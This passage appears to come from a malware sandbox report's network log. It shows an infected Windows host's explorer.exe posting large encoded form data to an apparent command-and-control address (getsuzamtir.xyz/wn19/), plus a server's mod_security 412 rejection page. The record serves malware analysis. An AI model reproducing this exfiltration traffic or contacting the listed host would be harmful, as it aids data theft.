47 32 64 33 35 67 42 53 33 56 72 6f 78 51 2d 78 51 73 53 4e 2d 77 6e 7a 69 53 30 42 55 6f 4e 76 49 6e 50 6d 37 63 68 78 32 59 64 6f 35 41 53 51 4f 41 74 7e 64 50 4b 69 4e 30 45 63 71 6f 41 39 7a 51 76 75 36 67 41 37 6b 59 4a 6e 32 58 45 66 53 68 47 53 36 64 53 4e 35 57 42 35 55 4c 6d 34 39 34 32 47 7a 6b 72 4a 48 7e 36 41 44 64 6d 41 35 71 73 4c 6a 37 53 79 6e 73 6c 76 74 4b 55 79 7a 69 56 28 33 5a 64 37 55 50 56 51 4d 55 69 35 48 50 51 72 4f 77 68 58 53 56 44 4e 36 63 6d 63 6a 34 55 55 4d 53 5a 4a 6b 44 36 6f 35 54 7a 55 36 69 67 39 59 6a 33 59 6d 7a 74 6a 76 68 4b 37 31 7a 69 52 2d 64 31 75 6f 33 67 6b 4a 43 58 76 35 71 72 54 49 50 79 75 6d 6a 5a 38 6c 39 49 76 34 62 5f 37 45 59 5f 6a 4a 76 55 55 4f 45 74 73 32 4e 30 44 37 46 62 35 47 56 2d 7a 46 4a 6f 32 4c 46 63 73 50 65 37 4e 62 42 46 51 6b 54 4d 45 44 28 6b 5a 47 54 79 39 79 65 5a 63 7a 71 31 6f 47 55 76 79 56 69 4d 4d 36 6a 56 70 46 4b 54 37 52 52 70 37 36 58 56 34 7a 46 6f 35 69 70 61 74 55 7e 62 37 65 4a 4e 64 55 6c 74 74 6a 41 4c 38 52 46 65 41 35 57 76 70 59 46 4b 78 79 77 57 66 45 6a 77 6a 4c 66 59 45 54 33 63 65 46 41 51 6a 64 6a 42 28 6e 49 35 7a 54 54 79 7e 36 71 4f 79 34 4e 31 30 74 6d 4b 67 55 57 50 57 45 73 45 44 48 6b 61 36 38 32 34 6e 51 45 63 41 6b 4a 50 58 31 41 4c 4a 6b 58 35 34 73 57 72 4a 6f 42 44 73 42 4c 76 36 32 42 73 6f 68 4a 5a 39 42 6c 36 42 45 73 4b 49 6a 34 67 70 54 75 4e 45 77 4c 79 75 6b 35 63 51 51 45 36 7e 41 6c 65 4c 76 6f 6e 62 70 45 51 6e 6d 4d 47 4e 6c 47 33 76 6c 49 65 46 7a 6c 52 59 69 67 45 4c 48 68 32 4d 62 65 68 64 5f 63 73 4c 57 42 4b 62 33 56 6f 44 70 54 77 4a 79 55 32 68 35 73 38 6e 79 5a 74 72 49 61 37 7a 73 71 78 6a 42 69 70 61 68 76 64 55 76 45 70 52 53 71 55 78 52 6e 62 6f 6f 50 5a 6d 49 4e 2d 69 35 33 31 51 70 63 4d 46 74 6e 6a 45 6b 70 58 44 4d 53 41 28 67 4f 41 4b 31 4d 43 73 6e 47 67 79 6d 76 4c 76 4c 72 49 76 64 34 6f 4e 6c 61 56 48 36 70 4b 76 6d 37 77 44 48 30 57 52 53 77 7a 6a 4d 6a 30 50 68 35 4d 48 51 30 7a 76 4b 4a 48 6d 59 37 31 38 73 49 5f 4f 72 73 61 57 52 4a 76 36 65 35 76 69 48 57 65 4e 59 55 33 51 37 73 6a 4e 30 4f 6a 68 6c 41 66 4c 7a 54 62 4f 72 4f 4c 6f 5f 71 64 31 6b 63 70 78 68 33 54 36 36 6a 2d 42 65 6c 36 72 31 41 59 62 71 6a 30 6c 46 31 37 6e 6e 49 67 71 79 41 54 37 39 46 56 63 7a 54 5a 62 33 62 50 46 39 46 5f 57 76 66 78 69 58 69 51 46 30 64 2d 4e 4f 61 45 58 53 41 33 33 67 70 62 6c 47 46 51 42 50 5a 34 38 5a 34 78 32 46 61 72 61 31 4c 63 55 72 33 42 52 5f 58 4a 4d 66 72 6c 6c 4d 56 4a 5a 51 50 30 49 55 6d 4f 71 73 46 2d 4b 73 64 57 66 75 77 69 46 33 4e 6a 28 31 52 63 7e 4b 4a 4e 76 6f 69 5a 71 78 74 56 66 55 44 65 35 43 42 56 6f 68 35 54 4f 34 52 4a 45 72 41 48 42 4c 49 4a 39 5a 4a 61 4d 33 32 45 74 79 35 34 76 79 55 38 62 6d 35 73 41 37 41 4d 33 32 59 5a 46 69 46 61 65 44 73 75 5a 41 76 45 50 74 6b 37 45 48 61 59 7e 7a 67 49 37 77 35 74 68 55 79 76 45 37 47 76 7e 77 4f 62 45 47 41 30 67 33 68 69 6d 47 57 68 7a 38 48 4d 75 58 79 59 56 64 33 35 33 73 64 68 75 47 46 78 50 70 39 6f
                                                                                                  Data Ascii: AVnXAh=iY3J2sj8f4yUdfPyN4rYIwIYD6W_LzLMlMx5WXzWyy5aZycZD_N1afjEjaVZcMM99zcJjxbvcIrx4eMiIXEaxtK6Z4h-c7qlcACKSO6R1LEzFfPTnsZlEEsnELWWOf1XzcqYyTGIDwiQACTql1vmnUMJSifViK~omhI8zXu4e8YxLiTfZEAgKotslGP2F0u35DVMQliaA0Ts(rHqrT~l4wrmPXJce3H2QmaC8VH6U283UjIk6JFNJ_xiwZnmX0ZgCWEpX-TkowVWqJCTBqAZghV7eE0OQ0HrBvA5e2MInCw3WLL2QRzN2ercz76egzzyvsMUcUxkz33_dmxWdo4z6xrye_aePiQTycGCVYVUaf~1JrBggG2d35gBS3VroxQ-xQsSN-wnziS0BUoNvInPm7chx2Ydo5ASQOAt~dPKiN0EcqoA9zQvu6gA7kYJn2XEfShGS6dSN5WB5ULm4942GzkrJH~6ADdmA5qsLj7SynslvtKUyziV(3Zd7UPVQMUi5HPQrOwhXSVDN6cmcj4UUMSZJkD6o5TzU6ig9Yj3YmztjvhK71ziR-d1uo3gkJCXv5qrTIPyumjZ8l9Iv4b_7EY_jJvUUOEts2N0D7Fb5GV-zFJo2LFcsPe7NbBFQkTMED(kZGTy9yeZczq1oGUvyViMM6jVpFKT7RRp76XV4zFo5ipatU~b7eJNdUlttjAL8RFeA5WvpYFKxywWfEjwjLfYET3ceFAQjdjB(nI5zTTy~6qOy4N10tmKgUWPWEsEDHka6824nQEcAkJPX1ALJkX54sWrJoBDsBLv62BsohJZ9Bl6BEsKIj4gpTuNEwLyuk5cQQE6~AleLvonbpEQnmMGNlG3vlIeFzlRYigELHh2Mbehd_csLWBKb3VoDpTwJyU2h5s8nyZtrIa7zsqxjBipahvdUvEpRSqUxRnbooPZmIN-i531QpcMFtnjEkpXDMSA(gOAK1MCsnGgymvLvLrIvd4oNlaVH6pKvm7wDH0WRSwzjMj0Ph5MHQ0zvKJHmY718sI_OrsaWRJv6e5viHWeNYU3Q7sjN0OjhlAfLzTbOrOLo_qd1kcpxh3T66j-Bel6r1AYbqj0lF17nnIgqyAT79FVczTZb3bPF9F_WvfxiXiQF0d-NOaEXSA33gpblGFQBPZ48Z4x2Fara1LcUr3BR_XJMfrllMVJZQP0IUmOqsF-KsdWfuwiF3Nj(1Rc~KJNvoiZqxtVfUDe5CBVoh5TO4RJErAHBLIJ9ZJaM32Ety54vyU8bm5sA7AM32YZFiFaeDsuZAvEPtk7EHaY~zgI7w5thUyvE7Gv~wObEGA0g3himGWhz8HMuXyYVd353sdhuGFxPp9o09~qK0r4AXI5kYkgzimcXGs1jpxHN_aYme10S7OyV68JlWIP(tdoBjKcW-OcVW(9kNE-5l470-JmIzFO0muABTPdhGbQZzRqXpbSjiY1lhWT9wxcnDcP4aR71zHCRMXLso0Lk3U1MWGrzfB1BP96jwNw3gnv9ojJxDrjvL1nUa9ywBnUrCmMzheyuGlOijtsNAcEe0eMptXp(vw17TY8MUFcBWK5QRtHGI0Pwoaanc1cqnhvFbYavFlcWfM4l0F6gwTLi9VgIrZldRBjcNi6rwecMwt79p29p736sZi9NDcAFwV9KwUFIAF27Im_tzc0deRiIgQkf6b-H0dIEXk2WtZTSaw870oA2OY9sQd1hWIEWRYOWq3-BI8iSDMUKc7FUX94OLJv(zSdyxlIgexQ5eqQDxvmqbN2C7aGuMRCfRIVXvJXi3So2QBFwEgeIRMnYz5LcJsJiOs3Aab59o~J27z3qlmjc_gB~jhWIDw5TrWrwe2PMwipBP96qFSFXpbYiX4Nub5hu6aXp7IWhMHAl-HeNNV70K(F4rWLmyp09EMR(O(3NU7kFrsobhv9eqeDQYu3LUGXLFziZjMbT6lk1U(o2k21PEissY2cuL5JRyJD49~bFjcE2AYAQ85hKfQD0Gsa~6xE(HC4QCzaizb2cYaXtZn7Kd7FbI9_DZJ7ZXJk17UhLTc9Q8vUFoOd1RCtzBPmwo0fF_XcE49Q531VdUVe2BBVpbcyPC3V2yy1n9iFsMGtGQZX25ku3T3c0R7htAZ1fv1BXqhdhkqwcYqZER9OLdngbE3M57hdMgyUb9nUCpwyiVW3OhiFw7FYzuOlKgcyZX75g9gfCR5ZGYeSOAY9aTvmfbSim-EMz2SxHL6cFg5jRFO1clF_eUmyse10~qSNEvwaBA4d2s4PqzACLJQaIJjqlVjmda98z_sycPnt0N9CSUfPXewP9Ww14Ewb0EPEmTGdkH07nRdlPljDNVquL7Snla99KqFl9vD4SDuo~bLoFugwE_2WchclVGvBEZWhn_I4PKid62s3wzqlYR3R~i6a(lrJF1FEszJv6vi6(6DaQEb4Tl9dsoZTBu3ANThrUW2cwMZ8Z4g2p75QMoVKu3UjEUVTgV(CMT(1WJKDsiB_RXx7OHPhkQVTH86tZNrbnE09X003LktpFFRkGa(4w2tbWQImsvQ9OvfQyJn0p-4itMdWp1(gf_08F1lYuGyt7cl-afDAotEBBtTy5BwCYgopr39UrcOkJSdkiUIrdF(2FdVYETjUDuL9gV0_Vtyqsri4YDcvzFBTFJPwiHgomwsNN3ex3xRvu0KJdE5LLhgFCJkvAMZhxnzwjeu6R3PeI0r0TPMhPtWfh7MnMDQ8SkO3Y3AlBGPPlZ1xVzuL7Z2FdUgyOiTvtwOhn5tbK518AFRzvbARtd1nfcyCVUO_8NUsvc9BJSpkdA2dq-xMS540GafvQ9SPtRkGRCHRseTWirKpg_~NH8pINRZXj-F8GDUNwLAAcwkHw2acP-a0AufSoG7fA51pPzPSD_kAR6f19VVOgAmtuYotl0vSDJIkoPtz6QYiT_Mo13j2pcWqF9gTsY6Ti6GU(me6qo9oDYtwxmKrYQIU8noLC-O0VMxcY9k8ze7lFOdhEDzCNb5NoK(uVTR2XKA90oKrwWycuJtJKR6XLC1NzVqhtyRLCSGRwQlUYk3QcM4hosz1NbHVwfpTNQcUh_isnGirSZdHvPqVTTrpUC2Q0tJ4FZx9fTsX3KgA5xy8FbPIR-3VkzWDtj(RZpuf8DzAq40vaVOrr2eYVAhym29jt1BzjneDJUBk~ePhazO4bxvjE2cEw4dShVEOLL0sP8Fl~iAgBxdxpI(9hXe9X2lfBzy07LgDP0pus0eVCz0ifmC36lpMfnff9aRV85T_tvZr6U5nvjajtw6F6rVYziYLbrQvK-XC2-n9f6pgoWdrFHGi0wrdVzK8w15E8uBluYBUuOgy(bC20AtQ6bm1tQfFjGpLPJXO6a2CXqsBFQQkOXWnE0h4PX2yf83Ltb52YUF9O81tX4iC71yZO2UlPAxu~vJpcIIAHOjQkYHgu7VdHV3apcLib3i0TlO9FFsygbWvPufo7ViUzxeV5pugvWp5jgP3mVHfGw8qQ3ydqVaeNgUvxZtzUuyvSRjjdUdvphDhSYC1KxCdVEtApgspn-Ni~98uwOo1MqVTizT-4zKHtVE4(ntWQToqVnKBvW0rTlPrLxz9MrMBNAqDIVd20oaUznIW0eIh64TtgU5DSqf9HuanYP1X1TJOjOMPCKAOZU3zhbUpWit9VFM9HvdhRIAOntKkjncJrLLDxa20dJoMlFT246q_cP4KlsVeN8R236K_~4bFLHHdK3rr3GnpKTa08Gb3nlCnPG9Zr_T-9l4HDoGmPi21da(p5h9JPHfoeqSXsTCgIZDDMCHHtmdRPOfW~yk3IaMPATICmkD2AFaVPQd2njgkctTttVIoTDUgBjPZzOTyBHTBLvtZqFwjd9RYFLhyVJEi7eldyd2XfoUQbc92TJ844B6dC-I9XVPEXb4BLQxOcZO5JTKME5x8GSYs5eCtkUwUXVZLgT~LQ5hatoVB1P2bELMYh31IFPLfrP(3W68AHFxvj3S0K-Tk9l1AzwneHVReq60leIYxgrm8SddzGADBlbyJ8Fzl(XYGAzJMLMokGYvK5xNssqZDe0a8SL~eMAVwO7b-dKg7S_Bcjbz
                                                                                                  May 10, 2022 14:26:27.376398087 CEST9845INHTTP/1.1 412 Precondition Failed
                                                                                                  Date: Tue, 10 May 2022 12:26:26 GMT
                                                                                                  Server: Apache
                                                                                                  Accept-Ranges: bytes
                                                                                                  Vary: User-Agent
                                                                                                  Content-Length: 606
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-2
                                                                                                  Content-Language: en
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 32 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 34 31 32 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 0a 3c 70 3e 59 6f 75 72 20 72 65 71 75 65 73 74 20 67 6f 74 20 66 69 6c 74 65 72 65 64 20 6f 75 74 20 64 75 65 20 74 6f 20 70 6f 73 73 69 62 6c 65 20 73 65 63 75 72 69 74 79 20 69 73 73 75 65 73 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4f 6e 65 20 6f 72 20 6d 6f 72 65 20 74 68 69 6e 67 73 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 77 65 72 65 20 73 75 73 70 69 63 69 6f 75 73 20 28 64 65 66 65 63 74 69 76 65 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 2c 20 69 6e 76 61 6c 69 64 20 63 6f 6f 6b 69 65 73 2c 20 62 61 64 20 70 61 72 61 6d 65 74 65 72 73 29 3c 2f 70 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 79 6f 75 20 64 69 64 20 6e 6f 74 68 69 6e 67 20 77 72 6f 6e 67 3a 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 74 72 79 20 61 67 61 69 6e 20 77 69 74 68 20 61 20 64 69 66 66 65 72 65 6e 74 20 62 72 6f 77 73 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 61 76 6f 69 64 20 61 6e 79 20 65 76 69 6c 20 63 68 61 72 61 63 74 65 72 73 20 69 6e 73 69 64 65 20 74 68 65 20 72 65 71 75 65 73 74 20 75 72 6c 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6f 6e 73 69 64 65 72 20 72 65 76 69 73 69 6e 67 20 74 68 65 20 72 75 6c 65 73 20 6f 66 20 74 68 65 20 6d 6f 64 5f 73 65 63 75 72 69 74 79 20 6d 6f 64 75 6c 65 20 6f 72 20 74 75 72 6e 69 6e 67 20 69 74 20 6f 66 66 20 66 72 6f 6d 20 79 6f 75 72 20 57 65 62 20 48 6f 73 74 69 6e 67 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 2e 3c 2f 70 3e 0a 0a 3c 68 72 20 2f 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <html><head><title>412 Error</title></head><body><h1>412 Error</h1><p>Your request got filtered out due to possible security issues.</p><p>One or more things in your request were suspicious (defective request header, invalid cookies, bad parameters)</p><p>If you think you did nothing wrong:</p><ul><li>try again with a different browser</li><li>avoid any evil characters inside the request url</li></ul><p>If you are the owner of the website, you can consider revising the rules of the mod_security module or turning it off from your Web Hosting Control Panel.</p><hr /></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.11.2049772199.192.29.21580C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:26:47.299779892 CEST9859OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.getsuzamtir.xyz
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.getsuzamtir.xyz
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.getsuzamtir.xyz/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 61 68 74 39 59 54 6c 62 4e 55 66 32 5a 50 45 33 56 66 43 4f 36 52 72 62 6b 49 31 48 33 31 67 30 4c 53 75 68 4a 42 37 4c 6e 35 43 63 55 75 35 58 6b 61 36 6b 44 37 61 70 41 78 71 7a 76 6c 64 67 50 56 34 6e 46 37 52 34 62 30 45 52 37 43 4e 31 38 4f 36 68 57 30 6f 53 72 75 47 51 6c 55 78 4a 7a 4e 4d 55 39 54 4e 43 55 31 74 6e 6f 47 34 45 70 78 41 70 31 54 30 39 62 39 45 79 36 48 6a 50 47 55 6e 48 30 6a 35 6c 35 41 4d 4f 37 33 28 71 61 5f 77 73 47 4c 6a 31 6a 6d 35 48 37 62 33 45 6d 4e 66 65 58 47 7e 5f 4d 33 4b 78 32 42 45 34 49 42 36 32 74 47 31 75 79 74 39 50 68 45 6e 6b 6b 4f 71 44 5a 4d 32 35 77 49 6b 33 47 62 52 78 4b 69 6f 33 68 73 79 69 73 31 7e 4d 48 39 6f 59 6e 75 6f 76 6b 70 44 64 39 4a 54 70 6c 6d 43 71 6c 38 6c 73 55 6c 43 69 30 74 38 4e 44 37 4c 34 6c 4f 51 66 54 51 39 36 75 4b 47 65 67 48 4d 51 78 47 72 56 74 4f 57 35 6f 34 62 35 61 6d 45 6e 72 52 52 59 4c 4e 49 45 5a 53 6f 62 68 51 34 36 37 6b 6f 62 35 79 31 6d 6f 5a 6b 49 66 43 54 30 41 5f 5a 62 62 74 6b 69 52 77 43 38 79 30 42 55 47 45 4d 63 79 59 4d 4c 6d 67 61 73 34 5a 6b 71 32 57 33 37 48 67 30 5a 77 4c 6b 32 39 4f 57 47 64 6c 45 71 70 62 74 72 4d 4f 58 4d 34 6a 37 6f 35 35 77 5f 44 41 38 62 4f 48 4b 79 65 5f 49 76 67 32 56 67 51 79 36 68 43 42 55 33 28 6b 43 78 51 55 6f 6b 6c 62 43 48 48 6b 66 49 55 63 49 6a 69 52 68 62 34 30 79 58 34 75 7e 4b 6c 62 30 44 74 62 4a 42 77 5a 52 6f 47 68 78 66 42 74 7a 47 6e 41 68 41 57 4f 4d 57 57 44 4c 6f 67 52 76 6a 72 35 61 73 56 6b 70 53 68 38 63 6c 39 4d 66 7a 37 33 37 5a 77 73 64 39 4c 7a 4d 63 50 6e 28 47 6a 55 35 63 4d 4a 46 69 52 4a 42 4c 62 42 77 33 45 58 6f 62 58 59 43 52 4c 57 31 36 31 69 50 37 51 57 55 30 6f 73 68 63 66 53 76 76 61 2d 51 68 36 6c 58 6f 37 6f 35 52 6c 4e 45 35 4e 6d 53 5a 67 59 70 6a 70 59 49 35 58 33 55 69 69 4c 7a 4d 4c 6c 42 51 76 42 6b 34 62 32 71 70 6d 43 79 71 41 48 72 50 6c 4d 77 47 64 6e 64 54 64 68 39 6d 6e 61 6a 6f 51 41 63 57 30 46 39 6b 73 2d 52 6e 4a 32 5a 68 50 62 77 53 4e 68 70 61 28 53 45 37 79 6f 38 66 6e 4a 48 34 65 4c 67 63 33 62 46 57 39 50 78 6a 76 71 41 7a 59 6d 50 35 6e 73 52 34 4f 53 5a 46 4c 56 31 77 72 52 30 50 42 4c 71 75 6f 52 61 51 38 61 57 73 7e 37 61 35 47 6d 61 36 31 41 41 63 30 69 4a 72 28 4f 33 46 33 43 6c 38 69 41 35 2d 41 44 66 38 41 74 50 31 63 62 56 30 41 55 52 6a 79 47 65 76 70 6d 34 7a 75 36 7a 55 7e 47 55 59 72 6f 6d 6c 58 76 33 78 71 37 35 4e 58 4f 58 79 41 44 5a 32 59 58 5a 75 65 6f 50 31 7a 4b 32 7a 41 42 5a 46 45 5a 77 38 4f 6d 76 31 4f 30 53 39 75 77 54 31 54 37 48 71 52 57 38 71 62 62 72 50 68 55 79 62 61 45 56 31 53 51 38 62 36 59 77 53 6e 4c 31 48 73 4a 48 4b 78 6f 61 4a 67 48 45 73 6e 31 63 6d 42 62 46 38 6f 50 31 63 55 52 79 78 71 79 77 68 76 79 52 75 6f 64 48 68 63 32 46 6b 7e 6b 65 6e 71 67 42 62 4d 51 50 4a 71 64 47 32 52 33 53 48 71 37 56 4c 45 6b 54 55 55 50 67 38 35 47 69 54 59 52 72 30 54 46 4f 58 5a 56 36 71 4b 62 41 45 72 52 74 6b 46 57 38 6f 55 74 31 73 7e 65 49 71 30 5a 35 46 56 71 4c 38 72 63 44 67 44 66 4d 5f 73 43 62 43 50 2d 68 50 70 58 55 45 28 66 70 4d 77 41 5a 58 6d 4d 66 4a 50 79 71 49 52 44 71 6e 32 62 30 67 57 43 63 75 4a 4b 46 77 45 33 33 68 46 35 6a 65 4c 73 42 68 59 63 46 41 45 50 69 4f 35 49 28 67 42 5f 37 77 69 68 78 6b 79 75 59 67 71 4c 37 30 72 67 67 6a 62 72 48 50 7a 32 76 42 32 63 5a 75 41 36 70 69 56 49 37 44 6d 72 7e 62 4a 6c 66 6b 6d 31 38 74 64 72 47 64 4d 43 48 61 4c 6d 43 48 47 6b 47 4c 55 53 4c 74 5a 6b 6e 6e 4b 38 6c 57 68 6d 62 65 28 6c 28 2d 51 4e 66 6e 58 71 6f 45 68 2d 57 6d 46 51 6f 4c 50 69 72 62 6f 4c 5a 50 53 72 7a 5f 44 6a 46 71 4b 77 4a 34 68 4e 63 75 36 4c 75 54 52 4a 35 78 54 38 30 71 37 6d 6a 76 43 6c 65 56 43 4d 73 77 30 79 4c 4a 7e 30 50 73 74 44 32 4f 6b 36 4c 37 5a 4a 51 44 6e 54 6f 51 67 68 7a 37 51 65 28 37 57 4a 49 44 6d 75 68 56 62 6e 71 75 4e 6b 73 33 33 64 45 71 7e 43 6d 6d 28 49 65 64 6f 46 67 43 28 49 74 4d 6e 53 53 72 58 70 57 45 76 58 38 68 37 63 4d 76 59 41 6d 61 48 54 68 76 63 32 63 61 6a 7a 43 70 62 73 38 6b 73 48 41 6e 7a 61 57 51 42 65 50 36 4c 61 41 32 48 71 79 4e 69 4a 72 6d 59 4e 4e 37 53 49 62 4d 57 70 34 4d 56 77 55 36 4a 6e 5a 53 48 53 34 48
                                                                                                  Data Ascii: AVnXAh=aht9YTlbNUf2ZPE3VfCO6RrbkI1H31g0LSuhJB7Ln5CcUu5Xka6kD7apAxqzvldgPV4nF7R4b0ER7CN18O6hW0oSruGQlUxJzNMU9TNCU1tnoG4EpxAp1T09b9Ey6HjPGUnH0j5l5AMO73(qa_wsGLj1jm5H7b3EmNfeXG~_M3Kx2BE4IB62tG1uyt9PhEnkkOqDZM25wIk3GbRxKio3hsyis1~MH9oYnuovkpDd9JTplmCql8lsUlCi0t8ND7L4lOQfTQ96uKGegHMQxGrVtOW5o4b5amEnrRRYLNIEZSobhQ467kob5y1moZkIfCT0A_ZbbtkiRwC8y0BUGEMcyYMLmgas4Zkq2W37Hg0ZwLk29OWGdlEqpbtrMOXM4j7o55w_DA8bOHKye_Ivg2VgQy6hCBU3(kCxQUoklbCHHkfIUcIjiRhb40yX4u~Klb0DtbJBwZRoGhxfBtzGnAhAWOMWWDLogRvjr5asVkpSh8cl9Mfz737Zwsd9LzMcPn(GjU5cMJFiRJBLbBw3EXobXYCRLW161iP7QWU0oshcfSvva-Qh6lXo7o5RlNE5NmSZgYpjpYI5X3UiiLzMLlBQvBk4b2qpmCyqAHrPlMwGdndTdh9mnajoQAcW0F9ks-RnJ2ZhPbwSNhpa(SE7yo8fnJH4eLgc3bFW9PxjvqAzYmP5nsR4OSZFLV1wrR0PBLquoRaQ8aWs~7a5Gma61AAc0iJr(O3F3Cl8iA5-ADf8AtP1cbV0AURjyGevpm4zu6zU~GUYromlXv3xq75NXOXyADZ2YXZueoP1zK2zABZFEZw8Omv1O0S9uwT1T7HqRW8qbbrPhUybaEV1SQ8b6YwSnL1HsJHKxoaJgHEsn1cmBbF8oP1cURyxqywhvyRuodHhc2Fk~kenqgBbMQPJqdG2R3SHq7VLEkTUUPg85GiTYRr0TFOXZV6qKbAErRtkFW8oUt1s~eIq0Z5FVqL8rcDgDfM_sCbCP-hPpXUE(fpMwAZXmMfJPyqIRDqn2b0gWCcuJKFwE33hF5jeLsBhYcFAEPiO5I(gB_7wihxkyuYgqL70rggjbrHPz2vB2cZuA6piVI7Dmr~bJlfkm18tdrGdMCHaLmCHGkGLUSLtZknnK8lWhmbe(l(-QNfnXqoEh-WmFQoLPirboLZPSrz_DjFqKwJ4hNcu6LuTRJ5xT80q7mjvCleVCMsw0yLJ~0PstD2Ok6L7ZJQDnToQghz7Qe(7WJIDmuhVbnquNks33dEq~Cmm(IedoFgC(ItMnSSrXpWEvX8h7cMvYAmaHThvc2cajzCpbs8ksHAnzaWQBeP6LaA2HqyNiJrmYNN7SIbMWp4MVwU6JnZSHS4HIb4vpXOfZR~_7PVRpTqVZciozUbcEcx4~xCu68c-lvpOfzMmwImi(k~3RMTi9I~bL33lKLCcMdB7x1R1IhBA8U6vx_Hcavk7mKB-CNwTBNOc0UP5if(7H_XAwzVbUItYx6A1VS8eDwCS2feG9HRjekC4Q2IAN4gBn2N_LFnAQqItqhGu5KkXEz1VBvXeEle1(hmYaXQn5riUBgFXX5p_Hl8ekQdJV4hy(ySi1Er-~rMsGAGlMFx5yMp9S8baYIuXSw67YPiM1YEO72Vb~tSLsxg4lyzMseytp2(cj7WY4kHzvJXJKFzmuNBZiJbnUrKBGv358GmfimOCR5rigFJ1ca89YxntbazUHiIgEld5hCJqMfquu1VaNO(4BTXFrtusBIpPw84Yclk3mW6kpZShtaJT9UfmE72PytOrh3SYz7ERPSS2amgNZlwZfjhhM_CfhGTdJwHcQrrJ5TtajwjLTNHw2VaRhITp0_hW6e3psWzRNda0GEijRKEojjIDtzBffFYIj-OpuvBd19mvzK500qwc8e3YrsFmYdkKuQTbMrxkjbRyqY8oU5AcsPaFfi77bK1JPPX2wikr(zIUtOfRWqI7LOoP6WqZeCZje4LfCit6mDFNr05xZeAaLwTECrd_WaDrVmIBFCkhTjbTla1qt4imtfXCfUKpzMMTORFci0O-0blfAgkeptnDJK8Nkt64nGOiBBPSFlzw4raG4EOVVZN79hh4YDCceQCBnDcjoWSO(Z6n8r5LkNke0YNix0a74YaJunBD3HFjE4Shuac7Ihs_J4diV-FxWZ9Mk7Y-r5tjh6yaJY4R55qG6dvW5Lbvl-bZpEbuFjC5hwQhw3mXrvySXxCvYw0sLfAwkeup1Dy_tgu2dcr2b1MkNh~Jz8cCHOl7BqKWDw0RYlA_mZpQcoF99hYl7Qi1fugBtahfbuq1WMwk(5TmUIM0yuNGw0XDYnMeEipfbwafLK87uA4UO7HjbKSwiIDkHXchYxwYpeffWYgZYmizjprKLIZ9hf(DxeeXk3qt7pVy2fssDakty6ftj9UCcIPpj3Lsfi0HeHvB4Om6NYTU8fcYGA0umBcbDp3ykPPQxvqCFvmVAxPAwbKMpHnXUAWEERrOw4g9nMPeEb~3sOwZM3j5mQRMCGTxfGik0zVY6CEY7b48imL4NlbhoMD5kLNU9uN995vRq_IK~G9U7qToJQcAoiOUNWT1InfKPAxRP4yPrylDzgRAqB0lIQkWxF8M7YyMWoqnEifZLyrrL36akyW5lLRfWTrxlNSEcZXNO5Na2OHd2EgMZ_aGjvCNX9FBBpsvkUITY92fH-eqMNGa1eOc~UB517zOXenP8bDttqH1N6uZcsyZVX3sSEpyjdfOaSXHpa2VKYY8fh3i0KVxIc2vxL5nrU0oD88onUTU6-tahkXc7wDS~KsXvwA6XfiA6FE9es8pVLZEF3hrUsQRx7TuxXoQq7853FendpQV7nvDK7i-uhhpbXrbpZR9Ush0SHecCNUoHHOepgmLWfTvzLu-9cOwT37_hFxey_bTM_Sll0xxQ09emwAa0RVoe30hayOAVRkDD5qEWwZCQoGlOUZ_m2P5k4G52Zp3KMGA5x6C1HDE(XTuQJ4OZ7N41w7W8Thw7WuwWlFfRAM5gkvO6oNTffEh(i3Z5EWlZvqBjzXzDEjqNybSGPxNWBlMFMmxyI4nj2fW11ucZTkwwUTEmsYrhF~N3ytPp4RqRcjbY2ubs4l4GuLSqfIU8p0vIv38zl4y4AqnMCq8ijiIvkzac3OCDxVIAh8ztR4eM6S2ejfNH6xBdNCUqIgWcG5Savq4r2nfDtICMRBoNFBzvozo~P6B2fSzSQQiEZxMB_NFyfnKeCpTenPqwpbb(AqA7k00Dk6oDn4kU_UlDLBgJfipFwNk8UhGBAnmW2BGOUtyxdjB522Uf_tXjbxx05iDv1L85S6I~6UkVPqP6-mdtWSnSri_1zdfkfExKlaKAhRs5VAmVanGhDnIU3~hmcapjYexdUl35TH6tp0wczIR5z0S7rLxTYPlloaVrNNLl4USUcl1UnLuMxQdc7uVntTo0khM5ABSX5jvWRwDl0hstNCxNJCupOeV0dvxfna7LYcCGjKRr-va8W9pJYbC(JwQDR5I8trQVVWXieKMfB1I3neTCuwRQmunX9nkojt5BaniusQTDlG2rPRQfcChlY1sjQVSjBC06I(vSYpLc_tgnGMz1d2RoReq6RjmH6uZy6H0YElg2En8gz64iqw-W5QRcQPkgws6sJ77(GhmOCwf8QMzQlBdi4YfqbT8xhp4f_27Jzt564LKnOjy4NBoSEAouLDvWqKB4yLEqt9ne-s-pSC7Y_5j